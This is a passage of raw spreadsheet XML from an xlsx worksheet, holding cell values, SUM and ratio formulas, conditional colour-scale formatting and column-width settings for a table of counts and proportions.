        <f t="shared" si="16"/>
        <v>18</v>
      </c>
      <c r="T25" s="225">
        <f t="shared" si="16"/>
        <v>26</v>
      </c>
      <c r="U25" s="225">
        <f t="shared" si="16"/>
        <v>32</v>
      </c>
      <c r="V25" s="234">
        <f t="shared" si="16"/>
        <v>76</v>
      </c>
      <c r="X25" s="250" t="s">
        <v>1472</v>
      </c>
      <c r="Y25" s="252">
        <f t="shared" ref="Y25:AC25" si="17">SUM(Y10:Y22)</f>
        <v>119</v>
      </c>
      <c r="Z25" s="252">
        <f t="shared" si="17"/>
        <v>326</v>
      </c>
      <c r="AA25" s="252">
        <f t="shared" si="17"/>
        <v>395</v>
      </c>
      <c r="AB25" s="252">
        <f t="shared" si="17"/>
        <v>873</v>
      </c>
      <c r="AC25" s="252">
        <f t="shared" si="17"/>
        <v>873</v>
      </c>
    </row>
    <row r="26">
      <c r="C26" s="250"/>
      <c r="D26" s="250"/>
      <c r="E26" s="250"/>
      <c r="F26" s="250"/>
      <c r="G26" s="250"/>
      <c r="H26" s="250"/>
      <c r="I26" s="250"/>
      <c r="J26" s="250" t="s">
        <v>1473</v>
      </c>
      <c r="K26" s="248">
        <f t="shared" ref="K26:N26" si="18">$O$25-K25</f>
        <v>35</v>
      </c>
      <c r="L26" s="248">
        <f t="shared" si="18"/>
        <v>28</v>
      </c>
      <c r="M26" s="248">
        <f t="shared" si="18"/>
        <v>23</v>
      </c>
      <c r="N26" s="248">
        <f t="shared" si="18"/>
        <v>18</v>
      </c>
      <c r="Q26" s="250" t="s">
        <v>1474</v>
      </c>
      <c r="R26" s="253">
        <f>V25-R25</f>
        <v>67</v>
      </c>
      <c r="S26" s="253">
        <f>V25-S25</f>
        <v>58</v>
      </c>
      <c r="T26" s="253">
        <f>V25-T25</f>
        <v>50</v>
      </c>
      <c r="U26" s="253">
        <f>V25-U25</f>
        <v>44</v>
      </c>
      <c r="V26" s="252"/>
      <c r="X26" s="250" t="s">
        <v>1475</v>
      </c>
      <c r="Y26" s="254">
        <f t="shared" ref="Y26:AB26" si="19">Y25/$AC$25</f>
        <v>0.1363115693</v>
      </c>
      <c r="Z26" s="254">
        <f t="shared" si="19"/>
        <v>0.3734249714</v>
      </c>
      <c r="AA26" s="254">
        <f t="shared" si="19"/>
        <v>0.4524627721</v>
      </c>
      <c r="AB26" s="254">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="AC26" s="252"/>
    </row>
    <row r="27">
      <c r="C27" s="250"/>
      <c r="D27" s="250"/>
      <c r="E27" s="250"/>
      <c r="F27" s="250"/>
      <c r="G27" s="250"/>
      <c r="H27" s="250"/>
      <c r="I27" s="250"/>
      <c r="J27" s="250" t="s">
        <v>1476</v>
      </c>
      <c r="K27" s="255">
        <f t="shared" ref="K27:N27" si="20">K25/(K25+K26)</f>
        <v>0.2045454545</v>
      </c>
      <c r="L27" s="255">
        <f t="shared" si="20"/>
        <v>0.3636363636</v>
      </c>
      <c r="M27" s="255">
        <f t="shared" si="20"/>
        <v>0.4772727273</v>
      </c>
      <c r="N27" s="255">
        <f t="shared" si="20"/>
        <v>0.5909090909</v>
      </c>
      <c r="Q27" s="250" t="s">
        <v>1477</v>
      </c>
      <c r="R27" s="254">
        <f t="shared" ref="R27:U27" si="21">R25/(R25+R26)</f>
        <v>0.1184210526</v>
      </c>
      <c r="S27" s="254">
        <f t="shared" si="21"/>
        <v>0.2368421053</v>
      </c>
      <c r="T27" s="254">
        <f t="shared" si="21"/>
        <v>0.3421052632</v>
      </c>
      <c r="U27" s="254">
        <f t="shared" si="21"/>
        <v>0.4210526316</v>
      </c>
      <c r="V27" s="252"/>
      <c r="Y27" s="252"/>
      <c r="Z27" s="252"/>
      <c r="AA27" s="252"/>
      <c r="AB27" s="252"/>
      <c r="AC27" s="252"/>
    </row>
    <row r="28">
      <c r="C28" s="250"/>
      <c r="D28" s="250"/>
      <c r="E28" s="250"/>
      <c r="F28" s="250"/>
      <c r="G28" s="250"/>
      <c r="H28" s="250"/>
      <c r="I28" s="250"/>
      <c r="J28" s="250" t="s">
        <v>1478</v>
      </c>
      <c r="K28" s="255">
        <f t="shared" ref="K28:N28" si="22">1-K27</f>
        <v>0.7954545455</v>
      </c>
      <c r="L28" s="255">
        <f t="shared" si="22"/>
        <v>0.6363636364</v>
      </c>
      <c r="M28" s="255">
        <f t="shared" si="22"/>
        <v>0.5227272727</v>
      </c>
      <c r="N28" s="255">
        <f t="shared" si="22"/>
        <v>0.4090909091</v>
      </c>
      <c r="Q28" s="250" t="s">
        <v>1479</v>
      </c>
      <c r="R28" s="254">
        <f t="shared" ref="R28:U28" si="23">1-R27</f>
        <v>0.8815789474</v>
      </c>
      <c r="S28" s="254">
        <f t="shared" si="23"/>
        <v>0.7631578947</v>
      </c>
      <c r="T28" s="254">
        <f t="shared" si="23"/>
        <v>0.6578947368</v>
      </c>
      <c r="U28" s="254">
        <f t="shared" si="23"/>
        <v>0.5789473684</v>
      </c>
      <c r="V28" s="252"/>
    </row>
    <row r="29">
      <c r="R29" s="252"/>
      <c r="S29" s="252"/>
      <c r="T29" s="252"/>
      <c r="U29" s="252"/>
      <c r="V29" s="252"/>
    </row>
    <row r="30">
      <c r="X30" s="256" t="s">
        <v>1480</v>
      </c>
      <c r="Y30" s="3"/>
      <c r="Z30" s="3"/>
      <c r="AA30" s="3"/>
      <c r="AB30" s="3"/>
      <c r="AC30" s="4"/>
      <c r="AJ30" s="256" t="s">
        <v>1481</v>
      </c>
      <c r="AK30" s="3"/>
      <c r="AL30" s="3"/>
      <c r="AM30" s="3"/>
      <c r="AN30" s="4"/>
    </row>
    <row r="31">
      <c r="X31" s="222" t="s">
        <v>1466</v>
      </c>
      <c r="Y31" s="223" t="s">
        <v>6</v>
      </c>
      <c r="Z31" s="223" t="s">
        <v>7</v>
      </c>
      <c r="AA31" s="223" t="s">
        <v>8</v>
      </c>
      <c r="AB31" s="223" t="s">
        <v>9</v>
      </c>
      <c r="AC31" s="224" t="s">
        <v>1482</v>
      </c>
      <c r="AE31" s="257" t="s">
        <v>1483</v>
      </c>
      <c r="AF31" s="257" t="s">
        <v>1484</v>
      </c>
      <c r="AJ31" s="226" t="s">
        <v>1466</v>
      </c>
      <c r="AK31" s="227" t="s">
        <v>6</v>
      </c>
      <c r="AL31" s="227" t="s">
        <v>7</v>
      </c>
      <c r="AM31" s="227" t="s">
        <v>8</v>
      </c>
      <c r="AN31" s="228" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="32">
      <c r="X32" s="233" t="s">
        <v>97</v>
      </c>
      <c r="Y32" s="234">
        <v>43.0</v>
      </c>
      <c r="Z32" s="234">
        <v>62.0</v>
      </c>
      <c r="AA32" s="234">
        <v>67.0</v>
      </c>
      <c r="AB32" s="234">
        <v>80.0</v>
      </c>
      <c r="AC32" s="235">
        <v>80.0</v>
      </c>
      <c r="AE32" s="254">
        <f t="shared" ref="AE32:AE44" si="25">AC32/AC10</f>
        <v>0.6896551724</v>
      </c>
      <c r="AF32" s="258">
        <f t="shared" ref="AF32:AF44" si="26">1-AE32</f>
        <v>0.3103448276</v>
      </c>
      <c r="AJ32" s="236" t="s">
        <v>97</v>
      </c>
      <c r="AK32" s="259">
        <f t="shared" ref="AK32:AN32" si="24">IF(Y10=0,"-",Y32/Y10)</f>
        <v>0.9347826087</v>
      </c>
      <c r="AL32" s="259">
        <f t="shared" si="24"/>
        <v>0.8493150685</v>
      </c>
      <c r="AM32" s="259">
        <f t="shared" si="24"/>
        <v>0.7701149425</v>
      </c>
      <c r="AN32" s="260">
        <f t="shared" si="24"/>
        <v>0.6896551724</v>
      </c>
    </row>
    <row r="33">
      <c r="X33" s="233" t="s">
        <v>204</v>
      </c>
      <c r="Y33" s="234">
        <v>0.0</v>
      </c>
      <c r="Z33" s="234">
        <v>0.0</v>
      </c>
      <c r="AA33" s="234">
        <v>0.0</v>
      </c>
      <c r="AB33" s="234">
        <v>0.0</v>
      </c>
      <c r="AC33" s="235">
        <v>0.0</v>
      </c>
      <c r="AE33" s="254">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="AF33" s="258">
        <f t="shared" si="26"/>
        <v>1</v>
      </c>
      <c r="AJ33" s="233" t="s">
        <v>204</v>
      </c>
      <c r="AK33" s="261">
        <f t="shared" ref="AK33:AN33" si="27">IF(Y11=0,"-",Y33/Y11)</f>
        <v>0</v>
      </c>
      <c r="AL33" s="261">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AM33" s="261">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="AN33" s="262">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
    </row>
    <row r="34">
      <c r="X34" s="233" t="s">
        <v>261</v>
      </c>
      <c r="Y34" s="234">
        <v>3.0</v>
      </c>
      <c r="Z34" s="234">
        <v>9.0</v>
      </c>
      <c r="AA34" s="234">
        <v>13.0</v>
      </c>
      <c r="AB34" s="234">
        <v>14.0</v>
      </c>
      <c r="AC34" s="235">
        <v>14.0</v>
      </c>
      <c r="AE34" s="254">
        <f t="shared" si="25"/>
        <v>0.2641509434</v>
      </c>
      <c r="AF34" s="258">
        <f t="shared" si="26"/>
        <v>0.7358490566</v>
      </c>
      <c r="AJ34" s="233" t="s">
        <v>261</v>
      </c>
      <c r="AK34" s="261">
        <f t="shared" ref="AK34:AN34" si="28">IF(Y12=0,"-",Y34/Y12)</f>
        <v>0.5</v>
      </c>
      <c r="AL34" s="261">
        <f t="shared" si="28"/>
        <v>0.6923076923</v>
      </c>
      <c r="AM34" s="261">
        <f t="shared" si="28"/>
        <v>0.619047619</v>
      </c>
      <c r="AN34" s="262">
        <f t="shared" si="28"/>
        <v>0.2641509434</v>
      </c>
    </row>
    <row r="35">
      <c r="X35" s="233" t="s">
        <v>262</v>
      </c>
      <c r="Y35" s="234">
        <v>0.0</v>
      </c>
      <c r="Z35" s="234">
        <v>2.0</v>
      </c>
      <c r="AA35" s="234">
        <v>6.0</v>
      </c>
      <c r="AB35" s="234">
        <v>6.0</v>
      </c>
      <c r="AC35" s="235">
        <v>6.0</v>
      </c>
      <c r="AE35" s="254">
        <f t="shared" si="25"/>
        <v>0.25</v>
      </c>
      <c r="AF35" s="258">
        <f t="shared" si="26"/>
        <v>0.75</v>
      </c>
      <c r="AJ35" s="233" t="s">
        <v>262</v>
      </c>
      <c r="AK35" s="261">
        <f t="shared" ref="AK35:AN35" si="29">IF(Y13=0,"-",Y35/Y13)</f>
        <v>0</v>
      </c>
      <c r="AL35" s="261">
        <f t="shared" si="29"/>
        <v>0.3333333333</v>
      </c>
      <c r="AM35" s="261">
        <f t="shared" si="29"/>
        <v>0.5</v>
      </c>
      <c r="AN35" s="262">
        <f t="shared" si="29"/>
        <v>0.25</v>
      </c>
    </row>
    <row r="36">
      <c r="X36" s="233" t="s">
        <v>450</v>
      </c>
      <c r="Y36" s="234">
        <v>0.0</v>
      </c>
      <c r="Z36" s="234">
        <v>0.0</v>
      </c>
      <c r="AA36" s="234">
        <v>4.0</v>
      </c>
      <c r="AB36" s="234">
        <v>5.0</v>
      </c>
      <c r="AC36" s="235">
        <v>4.0</v>
      </c>
      <c r="AE36" s="254">
        <f t="shared" si="25"/>
        <v>0.08</v>
      </c>
      <c r="AF36" s="258">
        <f t="shared" si="26"/>
        <v>0.92</v>
      </c>
      <c r="AJ36" s="233" t="s">
        <v>450</v>
      </c>
      <c r="AK36" s="261">
        <f t="shared" ref="AK36:AN36" si="30">IF(Y14=0,"-",Y36/Y14)</f>
        <v>0</v>
      </c>
      <c r="AL36" s="261">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="AM36" s="261">
        <f t="shared" si="30"/>
        <v>0.2666666667</v>
      </c>
      <c r="AN36" s="262">
        <f t="shared" si="30"/>
        <v>0.1</v>
      </c>
    </row>
    <row r="37">
      <c r="X37" s="233" t="s">
        <v>534</v>
      </c>
      <c r="Y37" s="234">
        <v>2.0</v>
      </c>
      <c r="Z37" s="234">
        <v>3.0</v>
      </c>
      <c r="AA37" s="234">
        <v>3.0</v>
      </c>
      <c r="AB37" s="234">
        <v>4.0</v>
      </c>
      <c r="AC37" s="235">
        <v>4.0</v>
      </c>
      <c r="AE37" s="254">
        <f t="shared" si="25"/>
        <v>0.6666666667</v>
      </c>
      <c r="AF37" s="258">
        <f t="shared" si="26"/>
        <v>0.3333333333</v>
      </c>
      <c r="AJ37" s="233" t="s">
        <v>534</v>
      </c>
      <c r="AK37" s="261">
        <f t="shared" ref="AK37:AN37" si="31">IF(Y15=0,"-",Y37/Y15)</f>
        <v>1</v>
      </c>
      <c r="AL37" s="261">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="AM37" s="261">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="AN37" s="262">
        <f t="shared" si="31"/>
        <v>0.6666666667</v>
      </c>
    </row>
    <row r="38">
      <c r="X38" s="233" t="s">
        <v>658</v>
      </c>
      <c r="Y38" s="234">
        <v>0.0</v>
      </c>
      <c r="Z38" s="234">
        <v>2.0</v>
      </c>
      <c r="AA38" s="234">
        <v>3.0</v>
      </c>
      <c r="AB38" s="234">
        <v>4.0</v>
      </c>
      <c r="AC38" s="235">
        <v>4.0</v>
      </c>
      <c r="AE38" s="254">
        <f t="shared" si="25"/>
        <v>0.06451612903</v>
      </c>
      <c r="AF38" s="258">
        <f t="shared" si="26"/>
        <v>0.935483871</v>
      </c>
      <c r="AJ38" s="233" t="s">
        <v>658</v>
      </c>
      <c r="AK38" s="261">
        <f t="shared" ref="AK38:AN38" si="32">IF(Y16=0,"-",Y38/Y16)</f>
        <v>0</v>
      </c>
      <c r="AL38" s="261">
        <f t="shared" si="32"/>
        <v>0.2857142857</v>
      </c>
      <c r="AM38" s="261">
        <f t="shared" si="32"/>
        <v>0.3</v>
      </c>
      <c r="AN38" s="262">
        <f t="shared" si="32"/>
        <v>0.06451612903</v>
      </c>
    </row>
    <row r="39">
      <c r="X39" s="233" t="s">
        <v>351</v>
      </c>
      <c r="Y39" s="234">
        <v>0.0</v>
      </c>
      <c r="Z39" s="234">
        <v>3.0</v>
      </c>
      <c r="AA39" s="234">
        <v>3.0</v>
      </c>
      <c r="AB39" s="234">
        <v>4.0</v>
      </c>
      <c r="AC39" s="235">
        <v>4.0</v>
      </c>
      <c r="AE39" s="254">
        <f t="shared" si="25"/>
        <v>0.1818181818</v>
      </c>
      <c r="AF39" s="258">
        <f t="shared" si="26"/>
        <v>0.8181818182</v>
      </c>
      <c r="AJ39" s="233" t="s">
        <v>351</v>
      </c>
      <c r="AK39" s="261" t="str">
        <f t="shared" ref="AK39:AN39" si="33">IF(Y17=0,"-",Y39/Y17)</f>
        <v>-</v>
      </c>
      <c r="AL39" s="261">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="AM39" s="261">
        <f t="shared" si="33"/>
        <v>0.75</v>
      </c>
      <c r="AN39" s="262">
        <f t="shared" si="33"/>
        <v>0.1818181818</v>
      </c>
    </row>
    <row r="40">
      <c r="X40" s="233" t="s">
        <v>397</v>
      </c>
      <c r="Y40" s="234">
        <v>0.0</v>
      </c>
      <c r="Z40" s="234">
        <v>0.0</v>
      </c>
      <c r="AA40" s="234">
        <v>1.0</v>
      </c>
      <c r="AB40" s="234">
        <v>1.0</v>
      </c>
      <c r="AC40" s="235">
        <v>1.0</v>
      </c>
      <c r="AE40" s="254">
        <f t="shared" si="25"/>
        <v>0.05</v>
      </c>
      <c r="AF40" s="258">
        <f t="shared" si="26"/>
        <v>0.95</v>
      </c>
      <c r="AJ40" s="233" t="s">
        <v>397</v>
      </c>
      <c r="AK40" s="261">
        <f t="shared" ref="AK40:AN40" si="34">IF(Y18=0,"-",Y40/Y18)</f>
        <v>0</v>
      </c>
      <c r="AL40" s="261">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="AM40" s="261">
        <f t="shared" si="34"/>
        <v>0.25</v>
      </c>
      <c r="AN40" s="262">
        <f t="shared" si="34"/>
        <v>0.05</v>
      </c>
    </row>
    <row r="41">
      <c r="X41" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="Y41" s="234">
        <v>2.0</v>
      </c>
      <c r="Z41" s="234">
        <v>6.0</v>
      </c>
      <c r="AA41" s="234">
        <v>13.0</v>
      </c>
      <c r="AB41" s="234">
        <v>18.0</v>
      </c>
      <c r="AC41" s="235">
        <v>18.0</v>
      </c>
      <c r="AE41" s="254">
        <f t="shared" si="25"/>
        <v>0.6428571429</v>
      </c>
      <c r="AF41" s="258">
        <f t="shared" si="26"/>
        <v>0.3571428571</v>
      </c>
      <c r="AJ41" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="AK41" s="261">
        <f t="shared" ref="AK41:AN41" si="35">IF(Y19=0,"-",Y41/Y19)</f>
        <v>1</v>
      </c>
      <c r="AL41" s="261">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="AM41" s="261">
        <f t="shared" si="35"/>
        <v>0.9285714286</v>
      </c>
      <c r="AN41" s="262">
        <f t="shared" si="35"/>
        <v>0.6428571429</v>
      </c>
    </row>
    <row r="42">
      <c r="X42" s="233" t="s">
        <v>505</v>
      </c>
      <c r="Y42" s="234">
        <v>1.0</v>
      </c>
      <c r="Z42" s="234">
        <v>9.0</v>
      </c>
      <c r="AA42" s="234">
        <v>19.0</v>
      </c>
      <c r="AB42" s="234">
        <v>21.0</v>
      </c>
      <c r="AC42" s="235">
        <v>24.0</v>
      </c>
      <c r="AE42" s="254">
        <f t="shared" si="25"/>
        <v>0.06266318538</v>
      </c>
      <c r="AF42" s="258">
        <f t="shared" si="26"/>
        <v>0.9373368146</v>
      </c>
      <c r="AJ42" s="233" t="s">
        <v>505</v>
      </c>
      <c r="AK42" s="261">
        <f t="shared" ref="AK42:AN42" si="36">IF(Y20=0,"-",Y42/Y20)</f>
        <v>0.1111111111</v>
      </c>
      <c r="AL42" s="261">
        <f t="shared" si="36"/>
        <v>0.06474820144</v>
      </c>
      <c r="AM42" s="261">
        <f t="shared" si="36"/>
        <v>0.1301369863</v>
      </c>
      <c r="AN42" s="262">
        <f t="shared" si="36"/>
        <v>0.05483028721</v>
      </c>
    </row>
    <row r="43">
      <c r="X43" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="Y43" s="234">
        <v>1.0</v>
      </c>
      <c r="Z43" s="234">
        <v>1.0</v>
      </c>
      <c r="AA43" s="234">
        <v>1.0</v>
      </c>
      <c r="AB43" s="234">
        <v>1.0</v>
      </c>
      <c r="AC43" s="235">
        <v>1.0</v>
      </c>
      <c r="AE43" s="254">
        <f t="shared" si="25"/>
        <v>0.1</v>
      </c>
      <c r="AF43" s="258">
        <f t="shared" si="26"/>
        <v>0.9</v>
      </c>
      <c r="AJ43" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="AK43" s="261">
        <f t="shared" ref="AK43:AN43" si="37">IF(Y21=0,"-",Y43/Y21)</f>
        <v>0.3333333333</v>
      </c>
      <c r="AL43" s="261">
        <f t="shared" si="37"/>
        <v>0.3333333333</v>
      </c>
      <c r="AM43" s="261">
        <f t="shared" si="37"/>
        <v>0.25</v>
      </c>
      <c r="AN43" s="262">
        <f t="shared" si="37"/>
        <v>0.1</v>
      </c>
    </row>
    <row r="44">
      <c r="X44" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="Y44" s="244">
        <v>1.0</v>
      </c>
      <c r="Z44" s="244">
        <v>3.0</v>
      </c>
      <c r="AA44" s="244">
        <v>4.0</v>
      </c>
      <c r="AB44" s="244">
        <v>4.0</v>
      </c>
      <c r="AC44" s="245">
        <v>4.0</v>
      </c>
      <c r="AE44" s="254">
        <f t="shared" si="25"/>
        <v>0.2</v>
      </c>
      <c r="AF44" s="258">
        <f t="shared" si="26"/>
        <v>0.8</v>
      </c>
      <c r="AJ44" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="AK44" s="263">
        <f t="shared" ref="AK44:AN44" si="38">IF(Y22=0,"-",Y44/Y22)</f>
        <v>0.5</v>
      </c>
      <c r="AL44" s="263">
        <f t="shared" si="38"/>
        <v>0.5</v>
      </c>
      <c r="AM44" s="263">
        <f t="shared" si="38"/>
        <v>0.4</v>
      </c>
      <c r="AN44" s="264">
        <f t="shared" si="38"/>
        <v>0.2</v>
      </c>
    </row>
    <row r="45">
      <c r="X45" s="220"/>
      <c r="Y45" s="220"/>
      <c r="Z45" s="220"/>
      <c r="AA45" s="220"/>
      <c r="AB45" s="220"/>
      <c r="AC45" s="220"/>
    </row>
    <row r="46">
      <c r="X46" s="220"/>
      <c r="Y46" s="220"/>
      <c r="Z46" s="220"/>
      <c r="AA46" s="220"/>
      <c r="AB46" s="220"/>
      <c r="AC46" s="220"/>
    </row>
    <row r="47">
      <c r="X47" s="250" t="s">
        <v>1482</v>
      </c>
      <c r="Y47" s="252">
        <f t="shared" ref="Y47:AC47" si="39">SUM(Y32:Y44)</f>
        <v>53</v>
      </c>
      <c r="Z47" s="252">
        <f t="shared" si="39"/>
        <v>100</v>
      </c>
      <c r="AA47" s="252">
        <f t="shared" si="39"/>
        <v>137</v>
      </c>
      <c r="AB47" s="252">
        <f t="shared" si="39"/>
        <v>162</v>
      </c>
      <c r="AC47" s="252">
        <f t="shared" si="39"/>
        <v>164</v>
      </c>
      <c r="AE47" s="255">
        <f>AC47/AC25</f>
        <v>0.1878579611</v>
      </c>
    </row>
    <row r="48">
      <c r="X48" s="250" t="s">
        <v>1485</v>
      </c>
      <c r="Y48" s="255">
        <f t="shared" ref="Y48:AB48" si="40">Y47/Y25</f>
        <v>0.4453781513</v>
      </c>
      <c r="Z48" s="255">
        <f t="shared" si="40"/>
        <v>0.3067484663</v>
      </c>
      <c r="AA48" s="255">
        <f t="shared" si="40"/>
        <v>0.346835443</v>
      </c>
      <c r="AB48" s="255">
        <f t="shared" si="40"/>
        <v>0.1855670103</v>
      </c>
    </row>
    <row r="49">
      <c r="X49" s="250" t="s">
        <v>1486</v>
      </c>
      <c r="Y49" s="255">
        <f t="shared" ref="Y49:AB49" si="41">1-Y48</f>
        <v>0.5546218487</v>
      </c>
      <c r="Z49" s="255">
        <f t="shared" si="41"/>
        <v>0.6932515337</v>
      </c>
      <c r="AA49" s="255">
        <f t="shared" si="41"/>
        <v>0.653164557</v>
      </c>
      <c r="AB49" s="255">
        <f t="shared" si="41"/>
        <v>0.8144329897</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="C8:F8"/>
    <mergeCell ref="J8:O8"/>
    <mergeCell ref="Q8:V8"/>
    <mergeCell ref="X8:AC8"/>
    <mergeCell ref="AJ8:AN8"/>
    <mergeCell ref="X30:AC30"/>
    <mergeCell ref="AJ30:AN30"/>
  </mergeCells>
  <conditionalFormatting sqref="AK10:AN22">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFE67C73"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AK32:AN44">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="formula" val="0.5"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFABDDC5"/>
        <color rgb="FF57BB8A"/>
      </colorScale>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4" width="26.63"/>
    <col customWidth="1" min="5" max="5" width="52.88"/>
    <col customWidth="1" min="6" max="6" width="37.13"/>
    <col customWidth="1" min="7" max="7" width="39.75"/>
    <col customWidth="1" min="8" max="15" width="33.0"/>
    <col customWidth="1" min="16" max="16" width="28.5"/>
    <col customWidth="1" min="17" max="17" width="41.38"/>
    <col customWidth="1" min="20" max="20" width="29.88"/>
    <col customWidth="1" min="21" max="21" width="38.63"/>
    <col customWidth="1" min="22" max="22" width="33.5"/>
    <col customWidth="1" min="23" max="23" width="24.75"/>
    <col customWidth="1" min="24" max="24" width="33.88"/>
    <col customWidth="1" min="25" max="25" width="24.88"/>
    <col customWidth="1" min="27" max="27" width="29.0"/>
    <col customWidth="1" min="28" max="28" width="35.5"/>
    <col customWidth="1" min="29" max="29" width="31.63"/>
    <col customWidth="1" min="30" max="30" width="26.88"/>
    <col customWidth="1" min="31" max="31" width="27.25"/>
    <col customWidth="1" min="32" max="32" width="23.0"/>
    <col customWidth="1" min="38" max="38" width="35.75"/>
    <col customWidth="1" min="39" max="39" width="27.25"/>
    <col customWidth="1" min="40" max="40" width="37.63"/>
    <col customWidth="1" min="41" max="41" width="27.63"/>
    <col customWidth="1" min="42" max="42" width="30.38"/>
    <col customWidth="1" min="43" max="43" width="42.25"/>
    <col customWidth="1" min="45" max="45" width="30.25"/>
    <col customWidth="1" min="46" max="46" width="25.38"/>
    <col customWidth="1" min="47" max="47" width="27.63"/>
    <col customWidth="1" min="48" max="48" width="27.88"/>
    <col customWidth="1" min="49" max="49" width="29.63"/>
    <col customWidth="1" min="50" max="50" width="32.75"/>
  </cols>
  <sheetData>
    <row r="2">
      <c r="B2" s="265" t="s">
        <v>1487</v>
      </c>
      <c r="C2" s="3"/>
      <c r="D2" s="3"/>
      <c r="E2" s="3"/>
      <c r="F2" s="3"/>
      <c r="G2" s="3"/>
      <c r="H2" s="3"/>
      <c r="I2" s="3"/>
      <c r="J2" s="3"/>
      <c r="K2" s="3"/>
      <c r="L2" s="3"/>
      <c r="M2" s="3"/>
      <c r="N2" s="3"/>
      <c r="O2" s="3"/>
      <c r="P2" s="3"/>
      <c r="Q2" s="4"/>
      <c r="T2" s="265" t="s">
        <v>1488</v>
      </c>
      <c r="U2" s="3"/>
      <c r="V2" s="3"/>
      <c r="W2" s="3"/>
      <c r="X2" s="3"/>
      <c r="Y2" s="3"/>
      <c r="Z2" s="3"/>
      <c r="AA2" s="3"/>
      <c r="AB2" s="3"/>
      <c r="AC2" s="3"/>
      <c r="AD2" s="3"/>
      <c r="AE2" s="3"/>
      <c r="AF2" s="4"/>
      <c r="AL2" s="265" t="s">
        <v>1489</v>
      </c>
      <c r="AM2" s="3"/>
      <c r="AN2" s="3"/>
      <c r="AO2" s="3"/>
      <c r="AP2" s="3"/>
      <c r="AQ2" s="3"/>
      <c r="AR2" s="3"/>
      <c r="AS2" s="3"/>
      <c r="AT2" s="3"/>
      <c r="AU2" s="3"/>
      <c r="AV2" s="3"/>
      <c r="AW2" s="3"/>
      <c r="AX2" s="4"/>
    </row>
    <row r="3">
      <c r="B3" s="266"/>
      <c r="Q3" s="267"/>
      <c r="T3" s="266"/>
      <c r="AF3" s="267"/>
      <c r="AL3" s="266"/>
      <c r="AX3" s="267"/>
    </row>
    <row r="4">
      <c r="B4" s="266"/>
      <c r="Q4" s="267"/>
      <c r="T4" s="266"/>
      <c r="AF4" s="267"/>
      <c r="AL4" s="266"/>
      <c r="AX4" s="267"/>
    </row>
    <row r="5">
      <c r="B5" s="266"/>
      <c r="Q5" s="267"/>
      <c r="T5" s="266"/>
      <c r="AF5" s="267"/>
      <c r="AL5" s="266"/>
      <c r="AX5" s="267"/>
    </row>
    <row r="6">
      <c r="B6" s="5"/>
      <c r="C6" s="6"/>
      <c r="D6" s="6"/>
      <c r="E6" s="6"/>
      <c r="F6" s="6"/>
      <c r="G6" s="6"/>
      <c r="H6" s="6"/>
      <c r="I6" s="6"/>
      <c r="J6" s="6"/>
      <c r="K6" s="6"/>
      <c r="L6" s="6"/>
      <c r="M6" s="6"/>
      <c r="N6" s="6"/>
      <c r="O6" s="6"/>
      <c r="P6" s="6"/>
      <c r="Q6" s="7"/>
      <c r="T6" s="5"/>
      <c r="U6" s="6"/>
      <c r="V6" s="6"/>
      <c r="W6" s="6"/>
      <c r="X6" s="6"/>
      <c r="Y6" s="6"/>
      <c r="Z6" s="6"/>
      <c r="AA6" s="6"/>
      <c r="AB6" s="6"/>
      <c r="AC6" s="6"/>
      <c r="AD6" s="6"/>
      <c r="AE6" s="6"/>
      <c r="AF6" s="7"/>
      <c r="AL6" s="5"/>
      <c r="AM6" s="6"/>
      <c r="AN6" s="6"/>
      <c r="AO6" s="6"/>
      <c r="AP6" s="6"/>
      <c r="AQ6" s="6"/>
      <c r="AR6" s="6"/>
      <c r="AS6" s="6"/>
      <c r="AT6" s="6"/>
      <c r="AU6" s="6"/>
      <c r="AV6" s="6"/>
      <c r="AW6" s="6"/>
      <c r="AX6" s="7"/>
    </row>
    <row r="8">
      <c r="T8" s="268" t="s">
        <v>1490</v>
      </c>
      <c r="AA8" s="268" t="s">
        <v>1491</v>
      </c>
      <c r="AL8" s="268" t="s">
        <v>1490</v>
      </c>
      <c r="AS8" s="268" t="s">
        <v>1491</v>
      </c>
    </row>
    <row r="11" ht="40.5" customHeight="1">
      <c r="B11" s="269" t="s">
        <v>31</v>
      </c>
      <c r="C11" s="59" t="s">
        <v>32</v>
      </c>
      <c r="D11" s="55" t="s">
        <v>34</v>
      </c>
      <c r="E11" s="58" t="s">
        <v>40</v>
      </c>
      <c r="F11" s="67" t="s">
        <v>1492</v>
      </c>
      <c r="G11" s="69" t="s">
        <v>1493</v>
      </c>
      <c r="H11" s="68" t="s">
        <v>1494</v>
      </c>
      <c r="I11" s="69" t="s">
        <v>1495</v>
      </c>
      <c r="J11" s="56" t="s">
        <v>1496</v>
      </c>
      <c r="K11" s="69" t="s">
        <v>1497</v>
      </c>
      <c r="L11" s="56" t="s">
        <v>1498</v>
      </c>
      <c r="M11" s="69" t="s">
        <v>1499</v>
      </c>
      <c r="N11" s="56" t="s">
        <v>1500</v>
      </c>
      <c r="O11" s="68" t="s">
        <v>1501</v>
      </c>
      <c r="P11" s="68" t="s">
        <v>1502</v>
      </c>
      <c r="Q11" s="70" t="s">
        <v>96</v>
      </c>
